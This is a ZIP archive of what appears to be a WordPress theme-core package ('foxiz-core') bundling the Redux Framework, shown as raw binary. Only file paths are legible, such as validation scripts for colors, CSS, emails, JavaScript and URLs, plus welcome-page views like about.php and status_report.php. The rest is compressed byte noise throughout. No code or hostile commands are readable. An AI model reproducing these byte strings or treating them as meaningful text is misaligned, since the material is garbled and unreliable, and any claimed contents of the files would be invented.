=Ҫ|tègJocykJկ@Uk.LFD7 vRP6Xͳ)Vس/y+ܦ HJ@BAMש#ov5iT(Ym|O6)x3@I?D>1 w]tazvyuqQޮm_;X59h6ÈA;lsxD,Vٸ- 0 A,/|R*2˂PKZI8~0G@MнFS,J]DxpA7pˍo`I'ߌC kC6aM;7 XQ$Ppd@Kj[j^Q4_ذ# d<4C7UqxLQ8jT+#!ct)>Z:T zxzۗR ~)Dz?[׸oίF&ID'6-(sejy4<ܩ-4 U0k 9\k[/P:{{Ȃp+w]!Lirx){ EڏuBT4-ÉXe]<Ʈn;]tmڹތ5`r4Wa*E[As2mYxZwQTj 8n.va`"ȉV F#Wo~~wryfgOމyIK1=܂`Pwd{?nw аݣP(dٗөvm* nRoo~M0Go$CZȐ*aEχ&d-R3Ew^EQtxL|lO0n)0oJ܌Mo$ yד ICc{4؝i'Ӷro' -6Rj/7ؾ)L򤳏xJObo.jufɩ?` k[g*( FI(g,t7:щ1r5nl٘{`4WbqW)ȵm CAO7a Qvb%oQq SDT4k8/޼>ڞxڶ[O.׫ꛈ+ޠc$L=Dx^Až{<랉 ώHB[xܝcc5t\~xѣm+'iȥ  q!m8-C҉[@x) E1@-.bgv&-s`Jrhx(u};l\ ۓ[b&Oo<n|l ,~h q^c=PWh;H,so )]Wu_ZN-HIO;[ Dž#$j4UƼhQ2I 5g9RFREvC[+biŏ]|UT[`Ӓf`Ns^FԨfRU]CL .9ό;gIJ]z6}2N jg)/uDQ4}8B;PWP¯k}fRLTx?q]O@,S~~vUI@IwNoWm ~ vz MY;KԔNNMu՜*>ʩ 鷬~r[ no¶nu*!p| ff &[lUQ(L]gQ՛04ƿP?E fwV_T>')QwנcNrR劥nCki82[9WS18yjlx`nXM`0iR`x=CsdF7* s.>? Bz.C5wޢbk .CuPKkT.foxiz-core/lib/redux-framework/inc/validation/PKkT4foxiz-core/lib/redux-framework/inc/validation/color/PKYRH5AYHfoxiz-core/lib/redux-framework/inc/validation/color/validation_color.phpXێ}`< t/lnf7AH0e0iPdZݔ=Π=UEbe@a˩߼J#.dײi qt*lK[*[Yw.ƃ(6Qy]JuT#u-ĮkZdUvb/>$PeŽ:?d0·ipajEhsVۊutӋA qMg:N=߷vS6W?w뇗Ľ8.|׬Ͽ(Hg?===ZxڰܑcLY$ߋ* >Eޡtx+DGqs3hi'5Q\5lQȇi?'nw9OKx^Z's,y3ðq||&R5ڡ14X4(h. PPs뭉Lfr&붼aSCBWqI/NfzI;OɂbV@PbP(qE%/@#ڀ:JsM X* Cf2. &ه2t:gNy:t5e&c(W0e|@{F}YXΗy6g.wiNaVG!| n+}Z15FF!5FrvpBgԦ)kYMadE۴Y !?\8G`W@TL=mp(vkK,k]ʚW:Q N2$2u#?@dA)ÌJ!5ĨĘ40CdyVxWD IABUPW=:֋_Y }et< 1Vg׫GѭE=:qjy|[qTrc[UT"RK 밁w2(T_uXEhrMSO|Ĝ&f6[gw4UraX $tܾ߱blzrj>vMԪH3`=j= =*WLϹ>_B!Uyw̜|(V9;ZBy)9_eıfA5=Gɓ"CɅpO 2b>k|dւ/Q_ džoN/.j}x؀d? OM0 =42<4\r }s'ǁϟd/7> u[V~}ý!8v0.} I|~uf,%K2PEQzn,%R :Ր "23פf;=O#pZ-փ0bǎW`_K&#F~qzvQojPb{ aۗGFZ x+]ehs^WHs ^~r}jP;om2)=]]3tfJurB/p߁co:Lr7KM6/.}4-܀.hXi.ꟻﺡ\>k֖2_WuE)4̖r&FW Ɛ[ofM'#mF;m f ]";b]k{sۧmͶsi؝PKkT8foxiz-core/lib/redux-framework/inc/validation/colorrgba/PKYRb+l L Pfoxiz-core/lib/redux-framework/inc/validation/colorrgba/validation_colorrgba.phpVmo0_q된" L&v&m}A C,lkUwBv8B^;z:͙^Lʮ LNK8F+aMq^j/&J b+%Ү7;{e˖KyVg3g쇇f/!wWL _6:d}ɾp)\5˄Q<1}xg>wLN|cUg)Q67R5\a36EhBA~;u0PLcE0~(=G׎K]>VakWMO +j#3o{ʼnߦ,;ԟ(4/rzVf}J̖Ge~޿z<:5/vBy%6̲Qr ^7f](AĪ0D T2ld rʖ`A іAtK{ va0U :q=NNA4ք/߾F0j "0% d H7Uh7핓2M/feW [#wWZ:ʊJD'q񡿁?PKkT2foxiz-core/lib/redux-framework/inc/validation/css/PKYRq}.Dfoxiz-core/lib/redux-framework/inc/validation/css/validation_css.phpTێ0}߯PC}*˛LS_`WޱC B5q&gg窬(`In-7aBܿ\;ˬM Vt>$Nf;`)PugNi_^a[od\Jp%B *z?]kE U;.=Ӵ1vMu'hnWYHæK*:[kӇC:xoc'C)aI32gML64+<&N1"*.\U`oq:sWpNNDZF7hҡ ƈTy_Z?ޮ9^lGؾb St[6ibiPG?5fVu1ﳁvCJxS^߲TΌ֩ިFFO/!+K~\fةmFA#J72g Ҽ#;Pv5Pz q s@ɓ\j5Gzx]:U$W7!Q).Fl~|+f|ۋϭ~PKkT4foxiz-core/lib/redux-framework/inc/validation/email/PKYRL[OHfoxiz-core/lib/redux-framework/inc/validation/email/validation_email.phpTKk@WL ^)LńBEl=DUK%[!~3|iM}q֨.!R*dy~ I 9Ipkaxa Kª+-M+cHbS!gUzP3m9؆h͡/`*jCQտViM/xad[+3|]Ϯ{yoCOaF7a߾s΍^)u6Rϑ`<½6)٪uˢS е| ɍ*QZ̭ ) v͒ $1<- [ ێftoic`A5*(nNQym:]~|da-qhkm8x A]P9Tkp$&xIr룪(elёi~xAPKkT>foxiz-core/lib/redux-framework/inc/validation/email_not_empty/PKYR\foxiz-core/lib/redux-framework/inc/validation/email_not_empty/validation_email_not_empty.phpKk@0H6~$n C{1PBid/w} {%e5dtfvfO{}Sn˳30Fs҂H J1//RЌ(Y;BqeJ<]kޫ2 kɤV n9JTq1fYS`-BI2׵Sg`FkMX{Rh͇S{ʵ,^~["嚥vKi}X ?\SUTxkH2A!lύ5 V,w{FϩJ–bC|cZ0́_FL𢤱eVibkJg,dTj&;q T氥1;ڌ1޷\9#N|c,b&lX~ivJo~:Z^B cKc# "sfNcöfxuy2Ht;Q8 -N۸$,^;@6moVqdc 380z.{^o .]E6R)-΃3bPKkT:foxiz-core/lib/redux-framework/inc/validation/html_custom/PKYRZߝ}UTfoxiz-core/lib/redux-framework/inc/validation/html_custom/validation_html_custom.phpSn@}+ `P쳵m0M_la-]i. `1}𰻓33"+F#p6 $hFij ,%Ig&qb14 kܠK&&b$6&FY)r LF >dž_>lv[ F!IיϱT6V$e:=5}qVEX)ӽT[g4kzF*(ܝUl/iic1=?5bYH!Z߲ԹfAQԔosZ:E]3R-;_kkqj+WiM˫RiE-q5j.zIۉˏPKkT1foxiz-core/lib/redux-framework/inc/validation/js/PKYRNBfoxiz-core/lib/redux-framework/inc/validation/js/validation_js.phpSN@}+ƄgDMLb|mv*+.1w;K[[-LΜ~ / +3D0Zcph<[V8Utt.3 4[g4i=i?a(iCORi*vmiiCfz{,+E2HHCH^`oYK]<hܦ;AmެVȶhh]Sxmj0e˽КAzz9}PKkT6foxiz-core/lib/redux-framework/inc/validation/no_html/PKYRcKD_]Lfoxiz-core/lib/redux-framework/inc/validation/no_html/validation_no_html.phpTKk@WL \)Lń@)ElDua'J~(% `&*V;m]zi:EU+V "; qԒ\*Xpi X#8MrH?zףj&mUFtm*Ḧ7ݔYyudb !3c|2!+LE*d"UbJ Ϙ6׵2ؕX'#&MISWJ+] )DPԦ d%کK lb#aZ3BRG F/~-Eֵv>/FH&#g^j|w!IvC#Ma@!'v_Q }hm5Joܧ;rmPMpG!cB>j웏4/[.0֙|a>,Ug2 < QP ` Dt@-;2l_2ӴG-Nho;)VK_urZG4NV]߂zN)5nU<#5ķ,55>$ņ;"f ̏nCOLK!7靲}mXnt?PKkT8foxiz-core/lib/redux-framework/inc/validation/not_empty/PKYRXqPfoxiz-core/lib/redux-framework/inc/validation/not_empty/validation_not_empty.phpTMk@WL rrMP0=FyW'!hWKGif 3o}/gHru/\BԾ?XSf&Ca^rKs0'[r605KzZSX_߿A&s<\8cKڬZv>8h_2m*l-Pwp_x;F9PKkT6foxiz-core/lib/redux-framework/inc/validation/numeric/PKYRW“YLfoxiz-core/lib/redux-framework/inc/validation/numeric/validation_numeric.phpTKK@+F($>j B"5nGU}iF89$30͗*9p iALJ%c4#r0BAN24Bim7|Ìb gR *.Fm5VZ*HIQZ"D 3~;q%`҄e&FP|9p!\⫮ge(BZYjGiunZR'`& ?x7<$ɶz~\:7T 7IRk=rx6M~J.JV"WOͼF]O\]i@ (aY9` /-Oh,fv}`c'bBIKV^u'ӊkWR+} da.e1Q-+6Beu'5]kW;bEީBΦ 'ltl~PKkT@foxiz-core/lib/redux-framework/inc/validation/numeric_not_empty/PKYRnW(`foxiz-core/lib/redux-framework/inc/validation/numeric_not_empty/validation_numeric_not_empty.phpTKo0 Wp@;AݵiKP l:jKY5}zrn'>;t !wP6DT2l~,VDQ [,Wz`f06ÿ[Y5aK3.Իß ` J4Ȍ[X;3]X*8F#(nB.8Re3*a[Yi I2I /.buu Eq7/aSwLͿ7KfeT.?ڽ\@1:m䷬A@Dfsij4,ʵN#N&\H;ۛUL؎.RôT}("c'#2Ѷ=1ON=z}f) %VV ) e{&9JxC>gOɑܸr<p$\KȲ[Q?F{&?PKkT;foxiz-core/lib/redux-framework/inc/validation/preg_replace/PKYRVVfoxiz-core/lib/redux-framework/inc/validation/preg_replace/validation_preg_replace.phpSMo0 +gŅ,\~2L{РsC6=p|p݉##a9:jxb+L`b&` ;Ad7 [ d{&,F\VS<-AUӶVe:=5}qK'aX|1_a܄(j0R `L"J[EN%-mlRgwu=`ĹBV)p ѷl WaؖosZY?fPSs7@'w=zqUprN^mL*iKjdsHx~7fITsFM`JQGנ%x ,ob)`T QrJ$x|rWHWja_(n> a*IeQ!X+%xq0<,=jh0>j6kX=gX,&cvŊpltG,V2MynçQ*yâa52)SX׽3 yb -r HH"ra|R>V^w".p+$_?]/w4"xwpq9V3wkcd͠u/`'>1bdF sdͩ]M`+*d#,ӊ c} }VOM?/LSA^tKgQnUxzyNbw[z1Xz&p"v7,^tzu U"uG:JZ=?u9tHMd'6+j:+Bx֗`eo#Y )6?H̦?#/PKkT2foxiz-core/lib/redux-framework/inc/validation/url/PKYRLHDfoxiz-core/lib/redux-framework/inc/validation/url/validation_url.phpTMo@WL%K` 5)M6"HUU60īYN !ʥfx3y짛r[^\5C T)LiB`f^,rS`iAGla+/)Vͯ$ዐqqA)0Z`Iػgn祝i&zs=곅{m`_S N7olVU?vYJgu+b|O֐ .D&"ʼnDFהNљNpx! آv S":>ӟJ԰ݾ腰z5%ܜVh"4 E9K?rD`ϟa*(XfɓmX6m)\#*I+eR){39ם)j&iJ/r2 ş\ E6P6_YyUţJ\ r8T_0j[F4Hyz=ଇR)O b=Aypȓͥd~0 NO|` %J\k=Nzrٮ%&9" ZJӴC.Ēq!}TD]Zz4=r~P66=b\Srd`Fu 8#uDgS>H)~a=M- V'k= -< \|1F`]1Jj]JRf+Z@),p9hQ2coNJVO&X*Y yUwuvU% X W[s(xrh}rixmֿON;IkK^d ZuAiVT!㓬~kS)M*N8'+^ ;|N59]m!!gg#ɲŒp9DP@'hWO)jT)lMR[}f X "S\J."[HkRf,gN\a\em6h*MV=8ȸ:"סyGo4;V4G#ZPdsД%b{WОۢ 9HcgaWzr鳘&[^5$a I-ou A-wK tM]xu}35m$+V{bՒ${hi2Ao-9Fwlk9zZ{ߥ[]ui4Kfucj@GKx.ytP͍(;Ih}D;8ЀFuHwW$:㡆*HȫEaNlݙ;{f}ݔNz4wݑC^:VC]g;"=w23sCu[HZxu4&i~lLOt3fϨi> v w E^iK(8ݫFl * _#2p[lp)y6MHgx5F-I^5;)?=Rɖ~u%W<{)CX.?g ϝ<@t]%@My MH%‡-rߋ{%^|!A0<v ySX7$j׈%$;88c?{3.=_hk)̶$5"}zȶaők"2OmEy+d?kd]I1cGw0q \'/^/BfKwqna& ѐSIckysٽ7 ),<} ?Y@ sBmH !3.) nJ!#Y A90y!=y'™. P>6zoG?=$jѴZ{ֳ'xpc"YrGA_Clɰ̾~x͛(o2By|=!;c..:"yJ6dA ( 0:sR?ech|Tl&CpU{K9n\%oYB*G=cs`ɜzECl.H铥R,#DȞE=6%/W =rqe5'_ ~!\V?e:\O,c V a] v$ONR>SI%cʹ^sאָ fѮ">J$*UM9jBDf_hC?.wNi!w4i̽[J]!:kG1]*DP}ƶG@O"a6kgz`YdL_=S=1ڮE-d:d1OfR3G44nGvD5unkvj ~A"ue3~C]]{3.ˌֹG`a؋w]?:V:Uݾ>]5 Obch =.OC JH,}(t2` ,[h'eߎUE0vbUHB"5 AO\nޏ A)Ĕ)4`?$<{sc.FVS !PDžUʏWHR&n.BspF)$L ᘺ gBvY YC"v;>YCVРހpAOAr<YG׈&@$-ZG{֚ů2m6mV.mW.oB'r=T;*_(7q%&9ߵG'`M*P @yטQL4Jе3ϥ,VRHSG smy^c>s++r3]`WUq/5ͷ8Jw~@}EDo.Xʿ#uNԈ7cd\BO])+& 4=ڇXοâwǸ4>FF̣5+4o>[Xwe@$beɊ1"e]`KB ZnWF?=DcpY䨼4.س9rjTGIk(5$.cӿgIyYyFR#b(× V{wh̝݊ 63WKnuS|VW1,c/i6kQ?]nF=u<^YA׸ݕgڸ? |Ff n(*$(I֚ƪPǰJZH6ڔ_{al7]i[ax0 ڵeI5cЃ#Tϑ}єĜԦ_ z^$ `O9zid=ɠ.X&n3̑~zx{ H15 7@ڀq߭` a!Qe'F\tE&ro%H!]39wNCu_}jj5mškA#CЃ9~^xg2P $ FB/#x/˃Vk-轒;h3UwF08F6{ܞC6oypsVlJAh>GRP+D;v*[s'I}}A=êfPgq+CrgAUF 9ٳ ~4IxX)qگ s'\@46 xnst}"1o~d*=5BX`gMذ[rdr~\'p2=ʼn7JD+h *ܪu!SQccrXnȷk "lrBu IW`tq?$UUy~1%n8ʡQ* T2/aK>!ӅHޞ{I&xΩX'Q<nTXR'H_74Ew-R(GŻZCw\񻣙VNT>bA@G4bR#EU  ^gН _oGmXupʝ1;`#^BNPKkT.foxiz-core/lib/redux-framework/inc/welcome/js/PKYR& c5Bfoxiz-core/lib/redux-framework/inc/welcome/js/jquery.easing.min.jsXrFSȀ~&Llm$Ǖ @Ïg\JžF&yӀdKn̍;ӧi!-rWUy:k,E̍y} )Ęe4#yHɼ`QNXLupWE,g<=Sv. I|dYD9[ENV9Kh&%0T[7a:i.sEc%E=@EZ{DlA*a ɯ_KzNXɜ98)TIiF)/sڲO"\$ (,Xѯ^<*IR7)rL<泅b)%+BʸJC7$ϼI1^;ً2(|MhxrВ@!yK3qiDL{;l "rْK UÈ * J^ɂTdQ,iu~+pܜ̍7N Ȇe<cwI'_@9SY*%Ff+Sl#=xK/h6hbF|X(M?'[v1&.'k&yܨFyj6"[XМZյCHl#xk8>9&x/-j?L-͆i}2 ,pt͖n dz1L6ǔxapzYkx򬗺c`Kȧj9p6V-2YSfpmHJZ1'77f- V&3n҆< B8=Ն:OƆ7 ~.w Ŝ-^gKkHc۲TV ~4\KڭHyWZ˗j㈸ n;H|^ GEJ,G1q3HkCr$l>T} ۚS}Y%p~G{VZ%`U,bC+: Lp2!r^X|Y7JHv!K[- .85w (>"^2XrOu|U#Nv;"9Bغ\] 4߇-ãD LCAZ]T@&͓QN[AJ(i偻=l}ԃ~ÇC*k_!^q4|>u]g8y>4( G9|P;Z\c;ȴ9 P<|[۟뵍</uxD/nfwwS6A8x]{Q.j6>섯oBۉymp /:saXWY͏̺ QrЌ 'wPKYR nj -Dfoxiz-core/lib/redux-framework/inc/welcome/js/redux-welcome-admin.jsn8_US&Aif3L4LX0mEd;=KnΥ.0!sdY22%_Ԍhxj'IXV|2 #'Id2-7,7d x4=.ńnx17LKn+>Ɋ_Ï?ݾ&$eQHe>e:զ tq5>:O?te jExGm;7̵'ԏ5׀J%K0485UĬ^z)K4,5P a6#P%<#?(k"1BI0FBܕŤ0C`Ak e̚)phwr%1ި3ɒ ͺv1T7iE죣 ^0҈ח12?6SnTZ utak&7(UtNIF EvqIgzӝin Q!N{GY|TbAP0Lo1 v GAۋ'”jQb޴ Pa}WB1F^k>gJ6ב :PG(Ќl&r U%tEyN J7`b])^Fm)I^daFvXxmL+ "&+xkɡ-t4ffJsvc*Ռ kFxE742XR1-[R/p Tf3eMUBZSnP8 |9!0tc`KsJdASnnONul gl<]- N0~{%!Iȗ‹lP̆YFd =5%_M-`؆ɆaK(#pd x$I\dڠ ;1Zw8ST4&vQmNERb|Mv!0^>/\ڇ̝vOCHL6n 95V+5W?,Elv9]7bXPCPEyQÎԼ˪N 8(IH9=X.<F]7{ 5JcM]OjXd9y9oU.yZ{1hLc?,>6r']VE4)eE0NFû˯C{35-C|ݥwvq35SuVc&j+jK)l[)dC [¦ZAMO[=7DxຆR5+4֗PK2c˳lxcuuٗ0 nKuVYX?Nz'+>PPofn@q.ӂga]z~n[t'g\nOf`^Vx]T %bᄄ3ޜ O$6 Hndvf Tw!,JnʶWgA80 Shyѳh &URf~AC%B l T56z)&^sPg$ƻ3U~O ܁"i>+uW7~48G[*:=0€:x^ZBlD/Da0+O4;GϱwjhDjƆX=-cgzG{k|H:ܱY4utz~f+Ⱦ6O^C {g3OgA+Ј%xhwZomk,8Yz;{`.@H]OzMbĈr-T hUWHU;#@XU׭-K)-⃾`Yb`ŧN-0 -&f,MلNg+H y+-K%kɸ nldARo;4c]JGiH:KEǟf[v,x^BW辁 a =xvD!eR2_ŤUɿ)`ޒ?F"}G3s̓2NǤÃaƛۅ/-3潅vPG@u 'i'PKkT1foxiz-core/lib/redux-framework/inc/welcome/views/PKYR^N:foxiz-core/lib/redux-framework/inc/welcome/views/about.phpWmo6_q19b)uX3h`V `Pb-IY~HɖmCԽh@9Mb!Hro o-S5JPu<\!˗z!x4E{xDܭm%T VP]v([6mr d&R|E:bK׭so;Yf %  QnT-Y \x8[(AW?lB$DpBmqj%18A6B^^ zpe-ǵs- a6# oG!L2 ̹r:{[5h,]N%ESH~@aJHB )z FKq9꧞z w-s('=S|HmK#<h2IQN, Z <W_<5Uxޫ揌CTX/I&$#5B*JuaWax@9s/_UȲiY lm*-*|Ġeֶ]*1uj7Pyewl;{?0!Ch !Wsmyۿzd &p@tqCDEƝ4ŚFK$e;Ygt[ONl ]zu Pt^psU*̥X2 !y|bc.3fAY`")1Uvkgp'LFlʺ> *5}N15ԝ,_ Ñ۩F m(mW *ti4h8RDw$u4N} 2qs$# XӜ.4ݞ"ՎB48S33pn[ s߁agJ= foxiz-core/lib/redux-framework/inc/welcome/views/changelog.phpuR=o0 +E nqk/u] tm3YDn1QRY#c؄AZ~[>EVo 𒰧1lɅjt,KyTmu"gNO9sלC6$$2,CaԱ"b|+;v & >_gAth;WE Ql$s x p%/|{u_];4^\yB-5K;pD?]b^vԵNmp?|]rM3D}oX.+lE[%0/ 6U&Uw*N˟Bc}`:L11ՉXklW>PKYR<foxiz-core/lib/redux-framework/inc/welcome/views/credits.phpuR]o@|XDvب.jK*EnXn Ʈw;1;岁L WAoOGk[Z@%%U*L0?a`c֒\͋n _aG!W /&~бymafvZAhCІJwJ* AvhҚZ P)R` >π@@Aiw)$~>`j`zׁԍQ Vi9߁iTCF*^8*@5Q/N^`z<˲Nj*f$wt^ =w;y5].0&c;Vc.$SlkA:qN8[,3uRD8?]%&R%Q +$M䌘8Ⱥn<iTtp :D(Bؕւ߷e5M *J%iMڥ݌ .Yd%I&3Hcf v9f6Yq%L&XG-TB)hq)HķMD4;LVy樅ɗoN][Srr~s340󷷦d~qu65$S2;\4vf'w {\6]607wgW ͳq˫)9\4$oΎof0t r)\l"_L,A֢ϚڣA Xju@62cZ{eb: 8TFSh8HE]7%/ɢEm6v~"~vߑ(#!Yf9*ݣ7 ZyѰRLS_ijnOa'֊AŇk G~tSfe ahpLV){@7Z Aqi#͓Dš MDA ~! ^ْ i+Ĕ$顏 %%rvxBC! {AHX(:@_NPPDIkȴ)w> --j}pyֺPKMiN"D"G, 504MLl:nRo*saH򑸋ԇ &Bd~_YREg_ec8v4]nm-혵#PSzuSMG08HQ wlښ*_l˄UM5}J3(d$X[sRtf)rNТA}qgWgo[iw ! Q_6VSWAED a=>rW7/c)_iL:04ũ/̲H(#rRYlQݧ_3dv3z $ۘaP>PKYRcNBfoxiz-core/lib/redux-framework/inc/welcome/views/status_report.php=kw۶+Pŭ֖ݻ_[=i6>'i}9{.%Bjd Ҳ7}g A|HbgD<=`-Go-y-Y@~gtuB.9%2q74 D=، Wģ3Po@OxeP KoeùN\"oD4Ki€Ko9MF8Nd`x3Ʊ.>[{ ڍ @4Ip7` D$ΌQӕ 5g,Q߈~_R?1?9ˈrszD8ѣǏN=vMYoq'ac.b Sd|,PK +䔀@1DיlyB~T{рK5[iSt$vHĝ^)&l|=KdI8#"L `J9X}o<:L Ȅ/[QbOBz|Fp:כSL?>Ճ>QGnI,Hf8@AhP:aQF iᓓZ5>9)C+$ ƏǮ >0|B4h/]R"u"50Z &E.+ Ut΂K46AsLI=WAH"Atd|.Ytv{&i10okrt|KEUNJ٢YW#EX c$hS>cfCA-G#E$h4>N1h(013B$b;sx Z9P{exxF BzaOqUT*]b|ccEHJ:,}&XUYBgaĨU=팴qj7G.%~Y'zITLL8G0#%֑OЧ\>X)YM{\&(8gt "~އw$/kzXv$(¤ 9>+5 u# ᒒwo^uCG׮ऌWCvWEH^QjP&I,<ۅX1,,`Ml{?oM:@G8 C.f%vd%ҝyc^IZU6ߎ2We7<0X[ Cwy笗 /0]!Zx36.lHuj uR!p,&M,vUB!aLlv[؜mbwW6gUȕ=i*YͽɃ&0¼Z邸S^ZIYT6'H'X,Mnl&:tdn(Y!m.YydZAEEpJ"6+maPJ-t =X^=6un]ҽatIeo <}}(s-9H!vÀ-4S5O(J9]: 䑵vSetXⅤ99&)4\.i^(Q3 jBIO򴃯y}~Lch`\S]m"gP-7U|c4c!0q#as2؜$tzږ M1H9 'Vl? vnkf\"1)_yO=8 $F$tDHM/)%EQulχk5vc&!qnkdQk|Cu ۾<[߾SWk-{&5IzA@|\|5c>Uc٨ܳ,4HlZof[vE?M{C.Zj? RX9K&br3b_l|˖E *.$n-pShV8#ié (leBq;B3]+DWi B{Wd \wc^o $} ]Np`9n@PHL 2PW" ΐGv w]v&4%2 V+Dls-.EȦVv]Df8y,2YH`~ٔJeK]Zͱ~K4 vRؒ:%|_NIU+6}Ke HZ )׻M<aB*e@CrHBlȜִ\Oe0Y7wbO`s󹢠SWA KQ3yʆcs?i[1 U$ dgשW0j) =G7ǰS6$|s#)CPI\"E΀] \˽oҕ:QSz}WBE 5^֎$;[=`sԱ\|chB%'c煥:K3ByW3erq*J8g۱O*B>Wxk~{`N4V wrKFvq ø&S .hۡs1yeHEe 0=ZI AQttwH88%F$4 ~8_oT"L[+LSS.TUe<<Bo(U*THf 7[aV$_Aoj]FP/:(zEEm_˓;U  0n84#H /yEv^FfAWSDDZS`5Mf4*N,*SlCeQVE2CJt- ,a-E8GL|([D6x;4ԗmA|614RF/g :q,ȑѓ.R!b6YNfXYIÍMZn\E+-VIZn9bm mǪ^ClJ,P6Fһ7(a):2[{Ȓ$,%qhN4ţ%pj_YҥrYZ+2S/E?M0ѓF]A-'k7Ma]G%v=uʚ*.5YKMY ek:~3,M}L˒d&Imoő-UZezvhD*"ZzUNS !0w5}X E\~<OxX5ݩ.v]1g 2xpb?{XtANREOZtg&Ff9To* h\nD/ׯt[99sicY?lL]/9|[OhCW+,m3&+YeRo\E-a%ȾX6 \-ru[+i ؙ֝赳OwllO?3@$@{0]O<#eA trqqa$m-'Sk}F^s!#I }f3qa(93uHphP_rRv"![x/b}R~GaSs(]b{u/|R'YG`ٳwnVdonXd"K{ԝ8(xP<է&Q0_XxݚgyUY@SbVSG#uXNbIsщ9 bwΘ> .T]Ґi.2iN1Z&Q /'IIYb)Yl19ߪ OTĝkqw,2bm1*̐[MhwA4Id&BD\m$pu;_ z{#:e3!Aeh=KA" B; 7Y U&j{=W[Њ\[b$ywR ެf9i9l4cm+VdrWu0Ulv!t~~Gj5rE* ྦZc&tX]}\4 Gz*rڐK=fM |~IKC9EBA$oc^dno[ЦeU,:yզmc!/ y& 7w׽VJ\Qm2 aB<:BX2c: flP$)zD8< <)gl %s6Y.,˽#7X#S@Z vyf+)0:qnxnwfŗ ē [%W!Z_Dk-lwtPҋdZ5 D\%Fȏr{uk5WjLJ+2W{3D#Gʰ,k/,ݘ5Eb%⫳>O|2 _1M1ӳfJLTg3){խ5Q#d4yU)N/#@RKF X]SCl|;0DBM%9 @}*=nz!OR4(:=aُx gWUI hC< H0 #2_Grq@~e0IhkI tZ!UtKUnjfԛ%ВRA/Y!)_,!=Ժ*|+f᜵K ۃ{ڈ΅A֢)ԹP,; :EJZ_ KOi"zQ&IFBx-54bD[pUq-J}3bq`A2g@㘢 o3ٺo6czG$ġqӾ.oEb.Pc@ь5E凟LAr[AYw1x1G0r<*| >;#P'X7,xdmP賞65t|w8>JxG2k*.?hXҸMaہF]p015ˀC5D+kO<áOy cCΙv>&]⫝k}j9^9؈n#];l2Mqfm)Y HH+t1?GԿ`԰tU 0IR5Р[ڿ3@66L7jdkA[c36聕>pS{S 0 4 Ӕgi.?ףI}]!,MjF@`Cp.<+?m+icquMEԲӟ-cp< cu=iߴbhMB7/e1~jF&ϥ#1Qs\D.2}%2A^_QU3ԃӑǏNGPKYRC͜<foxiz-core/lib/redux-framework/inc/welcome/views/support.phpYm۸_1]`e]KEsC(AIc]JTI^Ų-$i9 >g@ֈDKڮ5 ;=d^"Ȝ`讝 ]5TZ[ U`1OXKj Ћӈ޲%zu46wwP(Aiyazm|kGNP_DP,#v1}c5BS4Dɼ8vZAS5++֛WϤ&]M&:QPjx׼*gвAk3|98OII̋GDFpߜLG92uXR4ZaJ3> s|{~yh"Bu>V"+!]Dьpo i+,5/9ϜX.J]⥏^5y,2ᅱlؗUڌ@{X˝~"2_[aTw5{ցg%JJ=]ti}An}83I(:qX;zzV[K?@y}.wqߗJB5;p!Kk(7 ki}nTqM" x2 Έ7 b@%WV DvznɭwG4v"OSTTZFeWOuyC'|baX$Ym&#Bߒ#"|]smQxnνܮ/>Jm`ϝ|pշZӒ{ϗIU!tp=h|@~,Ԇ;3>WQT&VS:Ov\;H!FڔhbUzW zȳBVFd2qk*^kT)*|E赉ҥV}Ft8_}2"޳k(pYĕyJn) 4jt=7Eƛ+= #'sVKopx+6NK*ޥlnnϪ;!Wpfcqm̄,ܠdU:uSx]DdžySh /eEc~ i#Xhi %vK_oIp|/~ӫ5O4lp~ Enau\~{KMz7@ EM !{U/?+yQcUf>jKZjT^>@e/Rszb&R|iBv}f7؁ŏ.Ur+F}mw>$^{wwgVZq2VȌT1B*ޜm)u^g./|@$$H _@I}% X.O;OH쑐Mx>qN^^9!ꃍ}X}woQ! {ɜArg#uA3"d)1Дy $B2 FdB-) dc>~8s@?I%Ob\09t1^WȋLh$q'/D GLk#ܿ#mO|?"ddl4 }9 4MR8){25kEI&6گ _hTQAj|a2&,>=Rf4$DvM< A96߄ }.0ꃃ|lXR ƀrx@~ACPJgmPzŦQ2 Z9[&٧RjͤG"p|2y#ɲɓ$de`axfZXF] W!G+L4C'Y2Vޅ+ִf Q2Gߔ+Яyz?z]Vs Yg/| 1u[!J4&-gـIj_p C\ zο|qŋ7^ϟ_ m8@;Y2gzJ2'0L*(n|\ -3t*K=ź.~iAuKX#JQ,gRz֑փ^6,5eL=~ll}=ç dPǻ9bP`|<o+y vќ9$\A[LP3t."389"&G.{qZ]-. Si:|4rDg5uavOڮC/fo,˒_tjI DfZ'9H |#jo:;H@KvvO@Gbk Q*l*]j\R5Cp"u׊jH&_zyZ uhvOi֍6]cc}ccվN=ݟ\nm[ng_jƺ}Lʻg-*C0DTPb&m~kÚH/8c6KD!ʼn$cF %tɹ^()S3a݄f>~Q`S y(d9֕šxl' xL貣þ`!'3pQqHa!vKTY4~EFUjxHx]-ԩګO+vpEIUm#axֆҶ9g_zq]nٗ[1uv\֦z"Vzo+0ڜnLlpannAĎ-AASq&J;r s_0F/>KHlŵmmfؑ{:@ڂ-S6}'♗%iv% !t'xGX9hJwgpWnnz= k+nfFb|wf#f|ـĊ.QOӶ^$_A{Tsjw@ p;xu`@^!_0Q3ݭtRQjg`Oi(^&YLycȭ?V i.H;nO$ꘜ}T̋E赺,:'xRbʭo;arH2{,q{-QCOxk _}Pnx0Rai{ ʃE[mݐ~nNÃrG-"Zx 15.6۰ݖumY\+簭W{t!Dc4ӁB{[ŒVNN&oR6t u/:4o{X `X{6KݟȪTمjE+ڪV|ј+W2.Lb L>t(rhFoW\ MkHl?'h>AAd|ѱ0G绣FTȁy#~iu <+~-[i6Qfd"PaxC 7<cqt-])U㻤=mN# @]q_Tct/ZWg*w@2s¦jZa SV^LoVUYQȂF9kaCL9^Wb۔f,8[U se-RLFŔ97FV!%!j>AuţJ*!m2 }aJGlQhzx|þ*j »rٴ%w* w߆Md_f". ,vbfYV'oVn|U6vaXM֖qfE;lvrr ]օKq[soe+SymI½/vL U^,+J Ua#*iLaF~tx,X6Ν{#uF'5k#US v *wcNrhV>:|o{#p:'{=?:?~nHԟvvM@0nr*P&p4+6KIl R-nz[k)heY/nzˬ yVMl\]( _[`..nJoR))y-$$C_ > Of ?5V>oyv$E$mG\rgʑ1+9j~=! S[ĨhZ4xԛ$`z^q=X4v4YBp#ur2Xe|_3S=mj7Dh`Bҩ0z%cPc{Ix@* u &kЍ@T= T[IJS4} :ӛWa_#ƎV}pf|zU1*0tL €VtC@^9.!o@ i{OI叱0:UqK,!L5& !>UT[_F~\5\ պv^WG@3Sϒ dȑ2*dej kVK5EaqTML#^E^+ 